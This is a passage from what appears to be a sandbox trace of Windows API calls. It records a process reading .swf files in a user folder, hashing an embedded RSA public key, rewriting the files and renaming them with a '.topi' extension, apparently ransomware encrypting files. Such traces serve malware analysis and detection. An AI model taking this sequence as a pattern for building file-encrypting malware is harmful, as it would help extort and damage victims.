hHeap=0x680000, dwFlags=0x0, lpMem=0x316e968 | out: hHeap=0x680000) returned 1 [0096.933] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x10) returned 0x99e4c28 [0096.933] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e4a18 | out: hHeap=0x680000) returned 1 [0096.933] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x10) returned 0x99e4a18 [0096.933] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e4a48 | out: hHeap=0x680000) returned 1 [0096.933] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x8) returned 0x316e968 [0096.933] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e948 | out: hHeap=0x680000) returned 1 [0096.933] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x14) returned 0x314c608 [0096.933] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e968 | out: hHeap=0x680000) returned 1 [0096.933] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x18) returned 0x314c768 [0096.933] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e4bf8 | out: hHeap=0x680000) returned 1 [0096.933] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99e4bf8 [0096.933] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9f8 | out: hHeap=0x680000) returned 1 [0096.933] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x204) returned 0x99e9300 [0096.933] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e4a30 | out: hHeap=0x680000) returned 1 [0096.933] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x108) returned 0x3191bd8 [0096.933] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e4a18 | out: hHeap=0x680000) returned 1 [0096.933] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x210) returned 0x99e9528 [0096.933] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x314c768 | out: hHeap=0x680000) returned 1 [0096.933] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x10c) returned 0x31b6350 [0096.933] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9b8 | out: hHeap=0x680000) returned 1 [0096.933] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x108) returned 0x3191ac0 [0096.933] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e4bf8 | out: hHeap=0x680000) returned 1 [0096.933] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x200) returned 0x31d5100 [0096.933] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x3191bd8 | out: hHeap=0x680000) returned 1 [0096.934] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x100) returned 0x99deb40 [0096.934] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9c8 | out: hHeap=0x680000) returned 1 [0096.934] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x6df228 | out: hHeap=0x680000) returned 1 [0096.934] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99ded50 | out: hHeap=0x680000) returned 1 [0096.934] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99deb40 | out: hHeap=0x680000) returned 1 [0096.934] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x314c608 | out: hHeap=0x680000) returned 1 [0096.934] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x3191ac0 | out: hHeap=0x680000) returned 1 [0096.934] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e9528 | out: hHeap=0x680000) returned 1 [0096.934] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31d5100 | out: hHeap=0x680000) returned 1 [0096.934] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31b6350 | out: hHeap=0x680000) returned 1 [0096.934] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e958 | out: hHeap=0x680000) returned 1 [0096.934] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e4c28 | out: hHeap=0x680000) returned 1 [0096.934] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9d8 | out: hHeap=0x680000) returned 1 [0096.934] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e49d0 | out: hHeap=0x680000) returned 1 [0096.934] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x314df08 | out: hHeap=0x680000) returned 1 [0096.934] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e4c10 | out: hHeap=0x680000) returned 1 [0096.934] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e4be0 | out: hHeap=0x680000) returned 1 [0096.934] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ce620 | out: hHeap=0x680000) returned 1 [0096.934] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31c3f78 | out: hHeap=0x680000) returned 1 [0096.934] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99df068 | out: hHeap=0x680000) returned 1 [0096.934] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e4bc8 | out: hHeap=0x680000) returned 1 [0096.934] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x9a02f78 | out: hHeap=0x680000) returned 1 [0096.934] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e9300 | out: hHeap=0x680000) returned 1 [0096.934] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99def60 | out: hHeap=0x680000) returned 1 [0096.934] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31cb988 | out: hHeap=0x680000) returned 1 [0096.935] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31919a8 | out: hHeap=0x680000) returned 1 [0096.935] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x314d0e8 | out: hHeap=0x680000) returned 1 [0096.935] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9a8 | out: hHeap=0x680000) returned 1 [0096.935] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x314d0a8 | out: hHeap=0x680000) returned 1 [0096.935] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d9e08 | out: hHeap=0x680000) returned 1 [0096.935] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e1b68 | out: hHeap=0x680000) returned 1 [0096.935] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31c3fb0 | out: hHeap=0x680000) returned 1 [0096.935] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e1970 | out: hHeap=0x680000) returned 1 [0096.935] WriteFile (in: hFile=0x6a8, lpBuffer=0x99f92d8*, nNumberOfBytesToWrite=0x8060, lpNumberOfBytesWritten=0x9ccfb14, lpOverlapped=0x0 | out: lpBuffer=0x99f92d8*, lpNumberOfBytesWritten=0x9ccfb14*=0x8060, lpOverlapped=0x0) returned 1 [0096.935] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99f92d8 | out: hHeap=0x680000) returned 1 [0096.935] SetFilePointerEx (in: hFile=0x6a8, liDistanceToMove=0x8065, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0096.935] WriteFile (in: hFile=0x6a8, lpBuffer=0x99dea38*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x9ccfb50, lpOverlapped=0x0 | out: lpBuffer=0x99dea38*, lpNumberOfBytesWritten=0x9ccfb50*=0x100, lpOverlapped=0x0) returned 1 [0096.935] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99dea38 | out: hHeap=0x680000) returned 1 [0096.935] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x60) returned 0x316dff8 [0096.935] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x428) returned 0x9a04420 [0096.935] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ywA3qgOrH00u8DIzdAJmeI3ndBL6uaF5KTvM8FRT", cchWideChar=-1, lpMultiByteStr=0x9a04420, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ywA3qgOrH00u8DIzdAJmeI3ndBL6uaF5KTvM8FRT", lpUsedDefaultChar=0x0) returned 41 [0096.935] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x430) returned 0x31d01f0 [0096.935] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x9a04420 | out: hHeap=0x680000) returned 1 [0096.935] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316dff8 | out: hHeap=0x680000) returned 1 [0096.936] WriteFile (in: hFile=0x6a8, lpBuffer=0x31d01f0*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x9ccfb50, lpOverlapped=0x0 | out: lpBuffer=0x31d01f0*, lpNumberOfBytesWritten=0x9ccfb50*=0x28, lpOverlapped=0x0) returned 1 [0096.936] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31d01f0 | out: hHeap=0x680000) returned 1 [0096.936] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0096.936] WriteFile (in: hFile=0x6a8, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x9ccfb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x9ccfb50*=0x26, lpOverlapped=0x0) returned 1 [0096.936] CloseHandle (hObject=0x6a8) returned 1 [0096.937] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x90) returned 0x31b3f60 [0096.937] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x8a0) returned 0x31cf750 [0096.937] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31b3f60 | out: hHeap=0x680000) returned 1 [0096.937] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\_tGjm1G\\maGbw1-EQdYWWJa3QsH.swf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\_tgjm1g\\magbw1-eqdywwja3qsh.swf"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\_tGjm1G\\maGbw1-EQdYWWJa3QsH.swf.topi" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\_tgjm1g\\magbw1-eqdywwja3qsh.swf.topi")) returned 1 [0096.938] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31cf750 | out: hHeap=0x680000) returned 1 [0096.938] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31c3fe8 | out: hHeap=0x680000) returned 1 [0096.938] VirtualFree (lpAddress=0x3750000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0096.940] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31b4258 | out: hHeap=0x680000) returned 1 [0096.940] FindNextFileW (in: hFindFile=0x31c7500, lpFindFileData=0x9ccfba4 | out: lpFindFileData=0x9ccfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x34a90320, ftCreationTime.dwHighDateTime=0x1d5c396, ftLastAccessTime.dwLowDateTime=0x214a79f0, ftLastAccessTime.dwHighDateTime=0x1d5ba1b, ftLastWriteTime.dwLowDateTime=0x214a79f0, ftLastWriteTime.dwHighDateTime=0x1d5ba1b, nFileSizeHigh=0x0, nFileSizeLow=0xd63d, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Yc2x5vSq8CXQP.swf", cAlternateFileName="YC2X5V~1.SWF")) returned 1 [0096.940] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x60) returned 0x316dff8 [0096.940] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x8e) returned 0x31b4258 [0096.940] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316dff8 | out: hHeap=0x680000) returned 1 [0096.940] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\_tGjm1G\\Yc2x5vSq8CXQP.swf") returned=".swf" [0096.940] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\_tGjm1G\\Yc2x5vSq8CXQP.swf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\_tgjm1g\\yc2x5vsq8cxqp.swf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x6a8 [0096.940] GetFileSizeEx (in: hFile=0x6a8, lpFileSize=0x9ccfb40 | out: lpFileSize=0x9ccfb40*=54845) returned 1 [0096.940] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x3750000 [0096.944] SetFilePointerEx (in: hFile=0x6a8, liDistanceToMove=0xd617, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0096.944] ReadFile (in: hFile=0x6a8, lpBuffer=0x3750000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x9ccfb78, lpOverlapped=0x0 | out: lpBuffer=0x3750000*, lpNumberOfBytesRead=0x9ccfb78*=0x26, lpOverlapped=0x0) returned 1 [0096.945] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x30) returned 0x31c3fe8 [0096.945] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31c3fe8 | out: hHeap=0x680000) returned 1 [0096.945] SetFilePointer (in: hFile=0x6a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0096.945] ReadFile (in: hFile=0x6a8, lpBuffer=0x3750000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x9ccfb70, lpOverlapped=0x0 | out: lpBuffer=0x3750000*, lpNumberOfBytesRead=0x9ccfb70*=0xd63d, lpOverlapped=0x0) returned 1 [0096.946] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxnvHZzybKGUxH+Cc7ttW\\\\nHyoUm91TmryPiZ9LNnaMWhnZS7t38EODQuii2GcK55Ao4ABm2yEHPJ14ahmXpL+n\\\\n\\/k8p8BIMBjXGBDQcLASJ22fAabOruiNa83d0jz71y4\\/zLglfnHHFdyjFfNDlFvgG\\\\nipjfuYMJ2awwHYNxu0eGTRwFoeFN0gYV8wJauSL2tH\\/CRGeRp0GzRCXBasIKVhIe\\\\n6PmZEE3u03hDY6XBRU8yz4AFxBhgSJDJrrSoUyYfhrrxBXfeEicdl5iq8yJIRGs+\\\\nZiX0IBUK3KZQidFLch4zt8Xm8hGfH5Rks+xUVIAQP7+M3VHWYK9GmZZ5tjyWxwoO\\\\nIQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0096.946] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x1f1) returned 0x31d5100 [0096.946] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxnvHZzybKGUxH+Cc7ttW\\\\nHyoUm91TmryPiZ9LNnaMWhnZS7t38EODQuii2GcK55Ao4ABm2yEHPJ14ahmXpL+n\\\\n\\/k8p8BIMBjXGBDQcLASJ22fAabOruiNa83d0jz71y4\\/zLglfnHHFdyjFfNDlFvgG\\\\nipjfuYMJ2awwHYNxu0eGTRwFoeFN0gYV8wJauSL2tH\\/CRGeRp0GzRCXBasIKVhIe\\\\n6PmZEE3u03hDY6XBRU8yz4AFxBhgSJDJrrSoUyYfhrrxBXfeEicdl5iq8yJIRGs+\\\\nZiX0IBUK3KZQidFLch4zt8Xm8hGfH5Rks+xUVIAQP7+M3VHWYK9GmZZ5tjyWxwoO\\\\nIQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0096.946] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxnvHZzybKGUxH+Cc7ttW\\\\nHyoUm91TmryPiZ9LNnaMWhnZS7t38EODQuii2GcK55Ao4ABm2yEHPJ14ahmXpL+n\\\\n\\/k8p8BIMBjXGBDQcLASJ22fAabOruiNa83d0jz71y4\\/zLglfnHHFdyjFfNDlFvgG\\\\nipjfuYMJ2awwHYNxu0eGTRwFoeFN0gYV8wJauSL2tH\\/CRGeRp0GzRCXBasIKVhIe\\\\n6PmZEE3u03hDY6XBRU8yz4AFxBhgSJDJrrSoUyYfhrrxBXfeEicdl5iq8yJIRGs+\\\\nZiX0IBUK3KZQidFLch4zt8Xm8hGfH5Rks+xUVIAQP7+M3VHWYK9GmZZ5tjyWxwoO\\\\nIQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0096.946] CryptAcquireContextW (in: phProv=0x9ccfa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x9ccfa50*=0x6df228) returned 1 [0096.947] CryptCreateHash (in: hProv=0x6df228, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x9ccfa58 | out: phHash=0x9ccfa58) returned 1 [0096.947] CryptHashData (hHash=0x31c7580, pbData=0x31d5100, dwDataLen=0x1f1, dwFlags=0x0) returned 1 [0096.947] CryptGetHashParam (in: hHash=0x31c7580, dwParam=0x2, pbData=0x0, pdwDataLen=0x9ccfa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x9ccfa54) returned 1 [0096.947] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x11) returned 0x314d0e8 [0096.947] CryptGetHashParam (in: hHash=0x31c7580, dwParam=0x2, pbData=0x314d0e8, pdwDataLen=0x9ccfa54, dwFlags=0x0 | out: pbData=0x314d0e8, pdwDataLen=0x9ccfa54) returned 1 [0096.947] GetLastError () returned 0x0 [0096.947] CryptDestroyHash (hHash=0x31c7580) returned 1 [0096.947] CryptReleaseContext (hProv=0x6df228, dwFlags=0x0) returned 1 [0096.947] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31d5100 | out: hHeap=0x680000) returned 1 [0096.947] UuidCreate (in: Uuid=0x9ccfa48 | out: Uuid=0x9ccfa48) returned 0x0 [0096.948] UuidToStringA (in: Uuid=0x9ccfa48, StringUuid=0x9ccfa40 | out: StringUuid=0x9ccfa40) returned 0x0 [0096.948] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x30) returned 0x31c3fb0 [0096.948] RpcStringFreeA (in: String=0x9ccfa40 | out: String=0x9ccfa40) returned 0x0 [0096.948] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31c3fe8 | out: hHeap=0x680000) returned 1 [0096.948] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x30) returned 0x31c3fe8 [0096.948] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xd640) returned 0x9a06a00 [0096.948] SetFilePointer (in: hFile=0x6a8, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0096.948] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31c3fb0 | out: hHeap=0x680000) returned 1 [0096.948] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x1f0) returned 0x99e1970 [0096.948] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x30) returned 0x31c3fb0 [0096.948] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x1f0) returned 0x99e1b68 [0096.948] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x58) returned 0x99d9e08 [0096.949] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x40) returned 0x9a02f78 [0096.949] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99e4bc8 [0096.949] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x40) returned 0x9a02fc0 [0096.949] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99e4be0 [0096.949] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99e4c10 [0096.949] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99e49d0 [0096.949] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99e4c28 [0096.949] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x24) returned 0x31d4940 [0096.949] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x158) returned 0x9a04a18 [0096.949] RtlReAllocateHeap (Heap=0x680000, Flags=0x0, Ptr=0x9a04a18, Size=0x218) returned 0x99e9300 [0096.949] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x558) returned 0x9a04420 [0096.949] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e4c10 | out: hHeap=0x680000) returned 1 [0096.949] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e4c28 | out: hHeap=0x680000) returned 1 [0096.949] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e49d0 | out: hHeap=0x680000) returned 1 [0096.949] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31d4940 | out: hHeap=0x680000) returned 1 [0096.949] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x9a04420 | out: hHeap=0x680000) returned 1 [0096.949] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99e49d0 [0096.949] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x8) returned 0x316e9a8 [0096.949] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x10) returned 0x99e4c28 [0096.949] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x18) returned 0x314d0a8 [0096.949] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x9) returned 0x99e4c10 [0096.949] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x8) returned 0x316e9d8 [0096.950] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x10e) returned 0x31b6350 [0096.950] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef928 [0096.950] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x58) returned 0x99d9d48 [0096.950] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x14) returned 0x314d0e8 [0096.950] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x104) returned 0x31919a8 [0096.950] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x14) returned 0x314df08 [0096.950] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e958 [0096.950] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31b6350 | out: hHeap=0x680000) returned 1 [0096.950] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e4c28 | out: hHeap=0x680000) returned 1 [0096.950] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9d8 | out: hHeap=0x680000) returned 1 [0096.950] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e4c10 | out: hHeap=0x680000) returned 1 [0096.950] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x314d0a8 | out: hHeap=0x680000) returned 1 [0096.950] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9a8 | out: hHeap=0x680000) returned 1 [0096.950] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e49d0 | out: hHeap=0x680000) returned 1 [0096.950] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef928 | out: hHeap=0x680000) returned 1 [0096.950] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d9e08 | out: hHeap=0x680000) returned 1 [0096.950] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e9300 | out: hHeap=0x680000) returned 1 [0096.950] GetCurrentThreadId () returned 0x8c4 [0096.950] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x100) returned 0x99dea38 [0096.951] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x82) returned 0x99f8c40 [0096.951] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x2c) returned 0x31c3f78 [0096.951] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x80) returned 0x6df228 [0096.951] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x148) returned 0x31ce620 [0096.951] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9a8 [0096.951] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9d8 [0096.951] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x100) returned 0x99def60 [0096.951] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x64) returned 0x751ab8 [0096.951] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x751ab8 | out: hHeap=0x680000) returned 1 [0096.951] GetCurrentThreadId () returned 0x8c4 [0096.951] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x64) returned 0x751ab8 [0096.951] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x751ab8 | out: hHeap=0x680000) returned 1 [0096.951] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xeb) returned 0x9a03438 [0096.951] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x64) returned 0x751ab8 [0096.951] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x751ab8 | out: hHeap=0x680000) returned 1 [0096.951] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x64) returned 0x751ab8 [0096.951] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x751ab8 | out: hHeap=0x680000) returned 1 [0096.951] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x9a03438 | out: hHeap=0x680000) returned 1 [0096.951] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x100) returned 0x99df068 [0096.951] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9a8 | out: hHeap=0x680000) returned 1 [0096.951] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4c) returned 0x31cb988 [0096.952] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9a8 [0096.952] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x100) returned 0x99deb40 [0096.952] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9c8 [0096.952] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99e49d0 [0096.952] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9c8 | out: hHeap=0x680000) returned 1 [0096.952] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9c8 [0096.952] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9b8 [0096.952] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9f8 [0096.952] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e968 [0096.952] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e948 [0096.952] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e918 [0096.952] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e998 [0096.952] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99e4c10 [0096.952] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9b8 | out: hHeap=0x680000) returned 1 [0096.952] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x8) returned 0x316e9b8 [0096.952] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9c8 | out: hHeap=0x680000) returned 1 [0096.952] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9c8 [0096.953] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316ea18 [0096.953] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9e8 